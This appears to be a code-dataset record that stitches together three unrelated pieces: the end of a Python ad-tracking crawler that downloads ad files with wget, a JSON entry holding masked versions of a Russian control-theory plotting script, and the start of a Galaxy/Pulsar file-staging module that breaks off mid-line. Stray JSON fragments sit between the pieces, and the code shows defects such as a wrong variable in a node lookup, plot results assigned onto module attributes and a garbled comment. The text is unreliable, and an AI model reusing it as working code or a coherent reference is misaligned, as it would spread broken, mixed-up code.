}\n \"\"\"\n try:\n os.makedirs(out_folder)\n except OSError:\n LOG.debug('Creating output file folder ...')\n \n export_ad_counter = 1 # assign unique number to ads for export to mturk\n #short_listed_companies = ['google adsense', 'doubleclick']\n with open(os.path.join(out_folder,'ad_labelling.csv'), 'w') as fwtr:\n # write the titles\n fwtr.write('#{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}\\n'.format(\\\n 'Ad#', 'Company', 'FileType', 'Ad-Category', 'Website-URL',\\\n 'Refresh-Num','Training-Topic', 'Context-of-site', 'Total', 'Ad-src'))\n # make sure we only add one ad\n for train_category, cat_dict in results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, bugcount in bug_dict.items():\n if not bug.is_ad():\n #TODO check bug_type in ffext\n continue\n if bug.get_filetype() in ['swf', 'png', 'gif', 'jpg']:\n file_name = '%d.%s' % (export_ad_counter, bug.get_filetype())\n new_location = os.path.join(out_folder, file_name)\n copy2(bug.get_filepath(), new_location)\n fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7} , {8}, {9},\\\n \\n'.format(file_name, bug.get_name(), bug.get_filetype(),\n '' ,test_site, refresh_num, train_category, 'N/A', bugcount,\n bug.get_src()))\n export_ad_counter += 1\n\n\ndef get_bug_type(file_type):\n is_ad = False\n bug_type = 'text'\n if file_type.startswith('HTML') or \\\n file_type.startswith('ASCII') or \\\n file_type.startswith('UTF-8 Unicode English') or \\\n file_type.startswith('very short') :\n bug_type = 'text'\n elif (file_type.endswith('1 x 1') and file_type.startswith('GIF')): \n bug_type = 'gif'\n elif file_type.startswith('PNG'):\n bug_type = 'png'\n is_ad = True\n elif file_type.startswith('GIF'):\n bug_type = 'gif'\n is_ad = True\n elif file_type.startswith('Macromedia Flash'):\n bug_type = 'swf'\n is_ad = True\n elif file_type.startswith('JPEG'):\n bug_type = 'jpg'\n is_ad = True\n return bug_type, is_ad\n\n\ndef parse_buginfo(entry):\n \"\"\"\n Takes the json decoded bug information and inserts it into a WebBug instance\n \"\"\"\n bugname = entry['bug']['name'].replace(' ','').replace('/','_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try :\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = \"\"\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n return WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation,\n bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname)\n\ndef curl_worker_legacy(args):\n output_dir = args[0]\n saved_file_name = args[1]\n path = args[2]\n bug = args[3]\n curl_result_queue = args[4]\n\n # subprocess.call(['curl', '-o', path , bug.get_src() ])\n subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path , bug.get_src()])\n # Use the unix tool 'file' to check filetype\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n filetype, is_ad = get_bug_type(subpr_out)\n\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name, filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (saved_file_name,\\\n filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n curl_result_queue.put(bug)\n\ndef process_results_legacy(refresh_count, output_dir, ext_queue, result_queue,\\\n num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the 
firefox plugin and\n aggregates each bug's occurence in a given page. The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n bug_dict = {} # dict to keep track of how many duplicates of each bug, if\n # exists\n try:\n # separate the non-ads from the ads for ease of handchecking\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n\n # uses a pool of 'curl' workers\n curl_worker_pool = Pool(processes=num_of_workers)\n manager = Manager()\n curl_result_queue = manager.Queue()\n \n dl_counter = 0 # keep track of how many bugs downloaded\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('Timing out on get from queue...')\n break\n for entry in found_bugs:\n bugname = entry['bug']['name'].replace(' ','').replace('/','_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try :\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = \"\"\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n bug = WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation,\n bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname)\n try:\n # matched an entry in the bugdict, incr count and continue\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1 \n\n saved_location ='Visit%d_%s%d' % (refresh_count, bugname,\\\n dl_counter)\n dl_counter += 1\n save_to_path = os.path.join( output_dir, '%s' % saved_location)\n obj = curl_worker_pool.apply_async(curl_worker_legacy, \\\n ((output_dir, saved_location, save_to_path, bug, curl_result_queue),))\n try:\n sleep(0.5)\n curl_worker_pool.join()\n curl_worker_pool.close()\n curl_worker_pool.terminate()\n except Exception:\n LOG.debug('Closing pool')\n\n while not curl_result_queue.empty():\n cbug = curl_result_queue.get()\n # ugly code here\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open( os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w') as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n\n\ndef curl_worker(output_dir, input_queue, worker_output_queue, worker_id,\\\n ack_queue):\n while True:\n try: \n task = input_queue.get()\n if len(task) == 1 and task[0] == \"STOP\":\n LOG.debug('curl_worker %d received stop' % worker_id)\n break\n except Exception:\n LOG.error('Error:')\n #LOG.debug(task)\n\n saved_file_name = task[0]\n path = task[1]\n bug = task[2]\n \n try:\n # subprocess.call(['curl', '-o', path , bug.get_src()])\n subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path , bug.get_src()])\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n except Exception as e : \n LOG.debug('Exception captured %s\\n\\n' % e)\n\n filetype, is_ad = get_bug_type(subpr_out)\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name, filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (saved_file_name,\\\n filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n worker_output_queue.put(bug)\n ack_queue.put(worker_id)\n return \n\n\ndef build_nodes(jsonData):\n \"\"\"\n This function takes a JSON encoded output of the firefox addon and builds a\n call graph for the javascript/HTML redirections\n\n @rtype nodes: dict\n @return: A graph of redirection chains\n \"\"\"\n nodes = {}\n\n def _process_cookiestr(cookieStr):\n \"\"\"\n 
parses a dictionary of req/resp calls to extract the cookie information\n returns a list of cookies set on this domain\n \"\"\"\n cookie_list = []\n # parses cookie str if a cookie has been set\n for cookie in cookieStr.split('\\n'):\n c = {}\n for cook in cookie.split(';'):\n token = cook.split('=', 1)\n if len(token) < 2: \n # usually this is just a flag e.g HTTPOnly, HTTPSOnly\n continue\n c[token[0]] = token[1]\n cookie_list.append(c)\n return cookie_list \n \n def _check_node(d):\n try:\n domain_node = nodes[d]\n except KeyError:\n isBug, bug_name, bug_type = ADREGEX.search(domain)\n domain_node = WebNode(domain, isBug, bug_name, bug_type)\n nodes[d] = domain_node\n return domain_node \n \n #jsonData contains all the domains and all the req/resp pairs made to them\n #iterating over the domains first\n for domain, dval in jsonData.items():\n # but first check if a node for this domain has been created or not\n domain_node = _check_node(domain)\n cookie_list = []\n # iterating thru all the req/resp pairs on a domain\n for info in dval:\n domainPath = info['domainPath']\n referrerPath = info['referrerPath']\n referrer = info['referrer']\n cookieBool = info['cookie'] \n \n parsed_cookie = None \n if cookieBool:\n cookieStr = info['cookiestr']\n parsed_cookie = _process_cookiestr(cookieStr)\n cookie_list.append(parsed_cookie)\n domain_node.add_reqresp({'domainPath' : domainPath,\n 'referrer' : referrer,\n 'referrerPath' : referrerPath,\n 'cookieList' : parsed_cookie\n })\n # making sure that we also create the node for the referrer\n referrer_node = _check_node(referrer)\n referrer_node.add_child(domain_node)\n domain_node.add_parent(referrer_node)\n domain_node.set_cookies(cookie_list)\n return nodes\n\n\ndef filter_results(extQueue, timeout_value, url):\n \"\"\"\n This function takes the JSON output of the firefox addon, and matches the\n request URL against a list of known tracker/ads regexes. \n\n Returns data structure containing request/resp info\n Returns None if did not receive results from FF addon\n \"\"\"\n from Queue import Empty\n try:\n LOG.debug('Timeout value in filter_result :%d' % timeout_value)\n nodes = extQueue.get(True, timeout=timeout_value)\n \n except Empty as e:\n LOG.info('Did not receive any results from FF plugin for %s' % url)\n nodes = None\n finally:\n while not extQueue.empty():\n extQueue.get()\n return nodes\n\ndef process_results(refresh_count, output_dir, ext_queue, result_queue,\n num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. 
The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n workers_dict = {} # keep track of worker processes\n input_queue = Queue() # asynchronously feed workers task to do \n worker_output_queue = Queue() # output queue from workers\n ack_queue = Queue()\n bug_dict = {} # dict to keep track of how many duplicates of each bug, if\n # exists\n try:\n # separate the non-ads from the ads for ease of handchecking\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n # Directory is created, Okay to pass\n pass\n\n for i in range(num_of_workers):\n p = Process(target=curl_worker, args=(output_dir, input_queue,\\\n worker_output_queue, i, ack_queue))\n p.start()\n workers_dict[i] = p\n # uses a pool nodesurl' workers\n # curl_worker_pool = Pool(processes=8)\n # manager = Manager()\n # curl_result_queue = manager.Queue()\n \n dl_counter = 0 # keep track of how many bugs downloaded\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('No more bugs found, break out of queue')\n break\n\n for entry in found_bugs:\n bug = parse_buginfo(entry)\n try:\n # matched an entry in the bugdict, incr count and continue\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1 \n\n try:\n saved_location ='Visit%d_%s%d' % (refresh_count, bug.get_name(), dl_counter)\n dl_counter += 1\n save_to_path = os.path.join( output_dir, '%s' % saved_location)\n input_queue.put((saved_location, save_to_path, bug))\n except Exception as e:\n LOG.exception('%s' % e)\n\n for i in range(num_of_workers):\n # send stop signal\n input_queue.put((\"STOP\",))\n \n stopped = 0\n while stopped < len(workers_dict):\n ack = ack_queue.get()\n p = workers_dict[ack]\n p.join(timeout=1)\n if p.is_alive():\n p.terminate()\n LOG.debug('terminating process %d' % ack)\n stopped += 1\n \n while not worker_output_queue.empty():\n # receive results from the worker\n cbug = worker_output_queue.get()\n # ugly code here\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n\n with open( os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w') as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n return\n\n\n \n\n", "step-ids": [ 10, 14, 15, 16, 18 ] }
[ 10, 14, 15, 16, 18 ]
import control.matlab as ctrl import matplotlib.pylab as plt def process_data(num11, den11, num21, den21): w11 = ctrl.tf(num11, den11) w21 = ctrl.tf(num21, den21) print('результат w11={} w21={}'.format(w11, w21)) TimeLine = [] for i in range (1, 3000): TimeLine.append(i/1000) plt.figure(0, figsize = [7, 6]) [y11, x11] = ctrl.step(w11, TimeLine) [y21, x21] = ctrl.step(w21, TimeLine) plt.plot(x11, y11, "r", label='Исходная') plt.plot(x21, y21, "b", label='Увеличенная k и уменшенная Т') plt.title('Переходная функция звена') plt.ylabel('Амплитуда') plt.xlabel('Время(с)') plt.grid(True) plt.show() [y11, x11] = ctrl.impulse(w11, TimeLine) [y21, x21] = ctrl.impulse(w21, TimeLine) plt.plot(x11, y11, "r", label='Исходная') plt.plot(x21, y21, "b", label='Увеличенная k и уменшенная Т') plt.title('Импульсная функция звена') plt.ylabel('Амплитуда') plt.xlabel('Время(с)') plt.grid(True) plt.show() ctrl.mag, ctrl.phase, ctrl.omega = ctrl.bode(w11, w21, dB=False) plt.plot() plt.show() return w11, w21 print('1 - безынерционное звено') print('2 - апериодическое звено') print('3 - интегрирующее звено') print('4 - идеальное дифференцирующее звено') print('5 - реально дифференцирующее звено') print('Введите номер функции, которую необходимо отобразить:') func_number = int(input()) if func_number == 1: process_data([4.], [ 1.], [2.], [ 1.]) elif func_number == 2: process_data([3.], [2, 1.], [1.5, 0.], [4, 1.]) elif func_number == 3: process_data([1.], [1, 0.], [1.], [0.5, 0.]) elif func_number == 4: process_data([5, 0.], [1e-12, 1.], [10, 0.], [1e-12, 1.]) elif func_number == 5: process_data([3.], [1, 1.], [1.5, 0.], [2, 1.])
normal
{ "blob_id": "c08e6cee61e9f32a9f067a9554c74bb2ddbd7cf3", "index": 2288, "step-1": "<mask token>\n\n\ndef process_data(num11, den11, num21, den21):\n w11 = ctrl.tf(num11, den11)\n w21 = ctrl.tf(num21, den21)\n print('результат w11={} w21={}'.format(w11, w21))\n TimeLine = []\n for i in range(1, 3000):\n TimeLine.append(i / 1000)\n plt.figure(0, figsize=[7, 6])\n [y11, x11] = ctrl.step(w11, TimeLine)\n [y21, x21] = ctrl.step(w21, TimeLine)\n plt.plot(x11, y11, 'r', label='Исходная')\n plt.plot(x21, y21, 'b', label='Увеличенная k и уменшенная Т')\n plt.title('Переходная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n [y11, x11] = ctrl.impulse(w11, TimeLine)\n [y21, x21] = ctrl.impulse(w21, TimeLine)\n plt.plot(x11, y11, 'r', label='Исходная')\n plt.plot(x21, y21, 'b', label='Увеличенная k и уменшенная Т')\n plt.title('Импульсная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n ctrl.mag, ctrl.phase, ctrl.omega = ctrl.bode(w11, w21, dB=False)\n plt.plot()\n plt.show()\n return w11, w21\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef process_data(num11, den11, num21, den21):\n w11 = ctrl.tf(num11, den11)\n w21 = ctrl.tf(num21, den21)\n print('результат w11={} w21={}'.format(w11, w21))\n TimeLine = []\n for i in range(1, 3000):\n TimeLine.append(i / 1000)\n plt.figure(0, figsize=[7, 6])\n [y11, x11] = ctrl.step(w11, TimeLine)\n [y21, x21] = ctrl.step(w21, TimeLine)\n plt.plot(x11, y11, 'r', label='Исходная')\n plt.plot(x21, y21, 'b', label='Увеличенная k и уменшенная Т')\n plt.title('Переходная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n [y11, x11] = ctrl.impulse(w11, TimeLine)\n [y21, x21] = ctrl.impulse(w21, TimeLine)\n plt.plot(x11, y11, 'r', label='Исходная')\n plt.plot(x21, y21, 'b', label='Увеличенная k и уменшенная Т')\n plt.title('Импульсная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n ctrl.mag, ctrl.phase, ctrl.omega = ctrl.bode(w11, w21, dB=False)\n plt.plot()\n plt.show()\n return w11, w21\n\n\nprint('1 - безынерционное звено')\nprint('2 - апериодическое звено')\nprint('3 - интегрирующее звено')\nprint('4 - идеальное дифференцирующее звено')\nprint('5 - реально дифференцирующее звено')\nprint('Введите номер функции, которую необходимо отобразить:')\n<mask token>\nif func_number == 1:\n process_data([4.0], [1.0], [2.0], [1.0])\nelif func_number == 2:\n process_data([3.0], [2, 1.0], [1.5, 0.0], [4, 1.0])\nelif func_number == 3:\n process_data([1.0], [1, 0.0], [1.0], [0.5, 0.0])\nelif func_number == 4:\n process_data([5, 0.0], [1e-12, 1.0], [10, 0.0], [1e-12, 1.0])\nelif func_number == 5:\n process_data([3.0], [1, 1.0], [1.5, 0.0], [2, 1.0])\n", "step-3": "<mask token>\n\n\ndef process_data(num11, den11, num21, den21):\n w11 = ctrl.tf(num11, den11)\n w21 = ctrl.tf(num21, den21)\n print('результат w11={} w21={}'.format(w11, w21))\n TimeLine = []\n for i in range(1, 3000):\n TimeLine.append(i / 1000)\n plt.figure(0, figsize=[7, 6])\n [y11, x11] = ctrl.step(w11, TimeLine)\n [y21, x21] = ctrl.step(w21, TimeLine)\n plt.plot(x11, y11, 'r', label='Исходная')\n plt.plot(x21, y21, 'b', label='Увеличенная k и уменшенная Т')\n plt.title('Переходная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n [y11, x11] = ctrl.impulse(w11, TimeLine)\n [y21, x21] = ctrl.impulse(w21, TimeLine)\n plt.plot(x11, y11, 'r', label='Исходная')\n plt.plot(x21, 
y21, 'b', label='Увеличенная k и уменшенная Т')\n plt.title('Импульсная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n ctrl.mag, ctrl.phase, ctrl.omega = ctrl.bode(w11, w21, dB=False)\n plt.plot()\n plt.show()\n return w11, w21\n\n\nprint('1 - безынерционное звено')\nprint('2 - апериодическое звено')\nprint('3 - интегрирующее звено')\nprint('4 - идеальное дифференцирующее звено')\nprint('5 - реально дифференцирующее звено')\nprint('Введите номер функции, которую необходимо отобразить:')\nfunc_number = int(input())\nif func_number == 1:\n process_data([4.0], [1.0], [2.0], [1.0])\nelif func_number == 2:\n process_data([3.0], [2, 1.0], [1.5, 0.0], [4, 1.0])\nelif func_number == 3:\n process_data([1.0], [1, 0.0], [1.0], [0.5, 0.0])\nelif func_number == 4:\n process_data([5, 0.0], [1e-12, 1.0], [10, 0.0], [1e-12, 1.0])\nelif func_number == 5:\n process_data([3.0], [1, 1.0], [1.5, 0.0], [2, 1.0])\n", "step-4": "import control.matlab as ctrl\nimport matplotlib.pylab as plt\n\n\ndef process_data(num11, den11, num21, den21):\n w11 = ctrl.tf(num11, den11)\n w21 = ctrl.tf(num21, den21)\n print('результат w11={} w21={}'.format(w11, w21))\n TimeLine = []\n for i in range(1, 3000):\n TimeLine.append(i / 1000)\n plt.figure(0, figsize=[7, 6])\n [y11, x11] = ctrl.step(w11, TimeLine)\n [y21, x21] = ctrl.step(w21, TimeLine)\n plt.plot(x11, y11, 'r', label='Исходная')\n plt.plot(x21, y21, 'b', label='Увеличенная k и уменшенная Т')\n plt.title('Переходная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n [y11, x11] = ctrl.impulse(w11, TimeLine)\n [y21, x21] = ctrl.impulse(w21, TimeLine)\n plt.plot(x11, y11, 'r', label='Исходная')\n plt.plot(x21, y21, 'b', label='Увеличенная k и уменшенная Т')\n plt.title('Импульсная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n ctrl.mag, ctrl.phase, ctrl.omega = ctrl.bode(w11, w21, dB=False)\n plt.plot()\n plt.show()\n return w11, w21\n\n\nprint('1 - безынерционное звено')\nprint('2 - апериодическое звено')\nprint('3 - интегрирующее звено')\nprint('4 - идеальное дифференцирующее звено')\nprint('5 - реально дифференцирующее звено')\nprint('Введите номер функции, которую необходимо отобразить:')\nfunc_number = int(input())\nif func_number == 1:\n process_data([4.0], [1.0], [2.0], [1.0])\nelif func_number == 2:\n process_data([3.0], [2, 1.0], [1.5, 0.0], [4, 1.0])\nelif func_number == 3:\n process_data([1.0], [1, 0.0], [1.0], [0.5, 0.0])\nelif func_number == 4:\n process_data([5, 0.0], [1e-12, 1.0], [10, 0.0], [1e-12, 1.0])\nelif func_number == 5:\n process_data([3.0], [1, 1.0], [1.5, 0.0], [2, 1.0])\n", "step-5": "import control.matlab as ctrl\nimport matplotlib.pylab as plt\n\n\ndef process_data(num11, den11, num21, den21):\n w11 = ctrl.tf(num11, den11)\n w21 = ctrl.tf(num21, den21)\n print('результат w11={} w21={}'.format(w11, w21))\n TimeLine = []\n for i in range (1, 3000):\n TimeLine.append(i/1000)\n plt.figure(0, figsize = [7, 6])\n\n [y11, x11] = ctrl.step(w11, TimeLine)\n [y21, x21] = ctrl.step(w21, TimeLine)\n plt.plot(x11, y11, \"r\", label='Исходная')\n plt.plot(x21, y21, \"b\", label='Увеличенная k и уменшенная Т')\n plt.title('Переходная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n\n [y11, x11] = ctrl.impulse(w11, TimeLine)\n [y21, x21] = ctrl.impulse(w21, TimeLine)\n plt.plot(x11, y11, \"r\", label='Исходная')\n plt.plot(x21, y21, \"b\", label='Увеличенная k и 
уменшенная Т')\n plt.title('Импульсная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n\n ctrl.mag, ctrl.phase, ctrl.omega = ctrl.bode(w11, w21, dB=False)\n plt.plot()\n plt.show()\n return w11, w21\n\n\nprint('1 - безынерционное звено')\nprint('2 - апериодическое звено')\nprint('3 - интегрирующее звено')\nprint('4 - идеальное дифференцирующее звено')\nprint('5 - реально дифференцирующее звено')\nprint('Введите номер функции, которую необходимо отобразить:')\nfunc_number = int(input())\n\nif func_number == 1:\n process_data([4.], [ 1.], [2.], [ 1.])\n\nelif func_number == 2:\n process_data([3.], [2, 1.], [1.5, 0.], [4, 1.])\n\nelif func_number == 3:\n process_data([1.], [1, 0.], [1.], [0.5, 0.])\n\nelif func_number == 4:\n process_data([5, 0.], [1e-12, 1.], [10, 0.], [1e-12, 1.])\n\nelif func_number == 5:\n process_data([3.], [1, 1.], [1.5, 0.], [2, 1.])\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
import fnmatch import tempfile from contextlib import contextmanager from os import ( makedirs, unlink, ) from os.path import ( abspath, basename, dirname, exists, join, sep, ) from re import ( compile, escape, ) from typing import ( Any, Dict, List, Type, ) from urllib.parse import urlencode from galaxy.util.bunch import Bunch from .config_util import read_file from .transport import ( get_file, post_file, rsync_get_file, rsync_post_file, scp_get_file, scp_post_file, ) from .util import ( copy_to_path, directory_files, unique_path_prefix, ) DEFAULT_MAPPED_ACTION = 'transfer' # Not really clear to me what this should be, exception? DEFAULT_PATH_MAPPER_TYPE = 'prefix' STAGING_ACTION_REMOTE = "remote" STAGING_ACTION_LOCAL = "local" STAGING_ACTION_NONE = None STAGING_ACTION_DEFAULT = "default" # Poor man's enum. path_type = Bunch( # Galaxy input datasets and extra files. INPUT="input", # Galaxy config and param files. CONFIG="config", # Files from tool's tool_dir (for now just wrapper if available). TOOL="tool", # Input tool work dir files - e.g. task-split input file WORKDIR="workdir", # Job directory files (e.g. tool standard input/output and containerized command). JOBDIR="jobdir", # Input metadata dir files - e.g. metadata files, etc.. METADATA="metadata", # Galaxy output datasets in their final home. OUTPUT="output", # Galaxy from_work_dir output paths and other files (e.g. galaxy.json) OUTPUT_WORKDIR="output_workdir", # Meta job and data files (e.g. Galaxy metadata generation files and # metric instrumentation files) OUTPUT_METADATA="output_metadata", # Job directory files output. OUTPUT_JOBDIR="output_jobdir", # Other fixed tool parameter paths (likely coming from tool data, but not # necessarily). UNSTRUCTURED="unstructured", ) ACTION_DEFAULT_PATH_TYPES = [ path_type.INPUT, path_type.CONFIG, path_type.TOOL, path_type.WORKDIR, path_type.JOBDIR, path_type.METADATA, path_type.OUTPUT, path_type.OUTPUT_WORKDIR, path_type.OUTPUT_METADATA, path_type.OUTPUT_JOBDIR, ] ALL_PATH_TYPES = ACTION_DEFAULT_PATH_TYPES + [path_type.UNSTRUCTURED] MISSING_FILES_ENDPOINT_ERROR = "Attempted to use remote_transfer action without defining a files_endpoint." MISSING_SSH_KEY_ERROR = "Attempt to use file transfer action requiring an SSH key without specifying a ssh_key." class FileActionMapper: """ Objects of this class define how paths are mapped to actions. >>> json_string = r'''{"paths": [ \ {"path": "/opt/galaxy", "action": "none"}, \ {"path": "/galaxy/data", "action": "transfer"}, \ {"path": "/cool/bamfiles/**/*.bam", "action": "copy", "match_type": "glob"}, \ {"path": ".*/dataset_\\\\d+.dat", "action": "copy", "match_type": "regex"} \ ]}''' >>> from tempfile import NamedTemporaryFile >>> from os import unlink >>> def mapper_for(default_action, config_contents): ... f = NamedTemporaryFile(delete=False) ... f.write(config_contents.encode('UTF-8')) ... f.close() ... mock_client = Bunch(default_file_action=default_action, action_config_path=f.name, files_endpoint=None) ... mapper = FileActionMapper(mock_client) ... as_dict = config=mapper.to_dict() ... mapper = FileActionMapper(config=as_dict) # Serialize and deserialize it to make sure still works ... unlink(f.name) ... 
return mapper >>> mapper = mapper_for(default_action='none', config_contents=json_string) >>> # Test first config line above, implicit path prefix mapper >>> action = mapper.action({'path': '/opt/galaxy/tools/filters/catWrapper.py'}, 'input') >>> action.action_type == u'none' True >>> action.staging_needed False >>> # Test another (2nd) mapper, this one with a different action >>> action = mapper.action({'path': '/galaxy/data/files/000/dataset_1.dat'}, 'input') >>> action.action_type == u'transfer' True >>> action.staging_needed True >>> # Always at least copy work_dir outputs. >>> action = mapper.action({'path': '/opt/galaxy/database/working_directory/45.sh'}, 'workdir') >>> action.action_type == u'copy' True >>> action.staging_needed True >>> # Test glob mapper (matching test) >>> mapper.action({'path': '/cool/bamfiles/projectABC/study1/patient3.bam'}, 'input').action_type == u'copy' True >>> # Test glob mapper (non-matching test) >>> mapper.action({'path': '/cool/bamfiles/projectABC/study1/patient3.bam.bai'}, 'input').action_type == u'none' True >>> # Regex mapper test. >>> mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'input').action_type == u'copy' True >>> # Doesn't map unstructured paths by default >>> mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'unstructured').action_type == u'none' True >>> input_only_mapper = mapper_for(default_action="none", config_contents=r'''{"paths": [ \ {"path": "/", "action": "transfer", "path_types": "input"} \ ] }''') >>> input_only_mapper.action({'path': '/dataset_1.dat'}, 'input').action_type == u'transfer' True >>> input_only_mapper.action({'path': '/dataset_1.dat'}, 'output').action_type == u'none' True >>> unstructured_mapper = mapper_for(default_action="none", config_contents=r'''{"paths": [ \ {"path": "/", "action": "transfer", "path_types": "*any*"} \ ] }''') >>> unstructured_mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'unstructured').action_type == u'transfer' True >>> match_type_only_mapper = mapper_for(default_action="none", config_contents=r'''{"paths": [ \ {"action": "transfer", "path_types": "input"}, \ {"action": "remote_copy", "path_types": "output"} \ ] }''') >>> input_action = match_type_only_mapper.action({}, 'input') >>> input_action.action_type 'transfer' >>> output_action = match_type_only_mapper.action({}, 'output') >>> output_action.action_type 'remote_copy' """ def __init__(self, client=None, config=None): if config is None and client is None: message = "FileActionMapper must be constructed from either a client or a config dictionary." raise Exception(message) if config is None: config = self.__client_to_config(client) self.default_action = config.get("default_action", "transfer") self.ssh_key = config.get("ssh_key", None) self.ssh_user = config.get("ssh_user", None) self.ssh_host = config.get("ssh_host", None) self.ssh_port = config.get("ssh_port", None) self.mappers = mappers_from_dicts(config.get("paths", [])) self.files_endpoint = config.get("files_endpoint", None) def action(self, source, type, mapper=None): path = source.get("path", None) mapper = self.__find_mapper(path, type, mapper) action_class = self.__action_class(path, type, mapper) file_lister = DEFAULT_FILE_LISTER action_kwds = {} if mapper: file_lister = mapper.file_lister action_kwds = mapper.action_kwds action = action_class(source, file_lister=file_lister, **action_kwds) self.__process_action(action, type) return action def unstructured_mappers(self): """ Return mappers that will map 'unstructured' files (i.e. 
go beyond mapping inputs, outputs, and config files). """ return filter(lambda m: path_type.UNSTRUCTURED in m.path_types, self.mappers) def to_dict(self): return dict( default_action=self.default_action, files_endpoint=self.files_endpoint, ssh_key=self.ssh_key, ssh_user=self.ssh_user, ssh_port=self.ssh_port, ssh_host=self.ssh_host, paths=list(map(lambda m: m.to_dict(), self.mappers)) ) def __client_to_config(self, client): action_config_path = client.action_config_path if action_config_path: config = read_file(action_config_path) else: config = getattr(client, "file_actions", {}) config["default_action"] = client.default_file_action config["files_endpoint"] = client.files_endpoint for attr in ['ssh_key', 'ssh_user', 'ssh_port', 'ssh_host']: if hasattr(client, attr): config[attr] = getattr(client, attr) return config def __find_mapper(self, path, type, mapper=None): if not mapper: if path is not None: normalized_path = abspath(path) else: normalized_path = None for query_mapper in self.mappers: if query_mapper.matches(normalized_path, type): mapper = query_mapper break return mapper def __action_class(self, path, type, mapper): action_type = self.default_action if type in ACTION_DEFAULT_PATH_TYPES else "none" if mapper: action_type = mapper.action_type if type in ["workdir", "jobdir", "output_workdir", "output_metadata", "output_jobdir"] and action_type == "none": # We are changing the working_directory/job_directory relative to what # Galaxy would use, these need to be copied over. action_type = "copy" action_class = actions.get(action_type, None) if action_class is None: message_template = "Unknown action_type encountered %s while trying to map path %s" message_args = (action_type, path) raise Exception(message_template % message_args) return action_class def __process_action(self, action, file_type): """ Extension point to populate extra action information after an action has been created. """ if getattr(action, "inject_url", False): self.__inject_url(action, file_type) if getattr(action, "inject_ssh_properties", False): self.__inject_ssh_properties(action) def __inject_url(self, action, file_type): url_base = self.files_endpoint if not url_base: raise Exception(MISSING_FILES_ENDPOINT_ERROR) if "?" not in url_base: url_base = "%s?" 
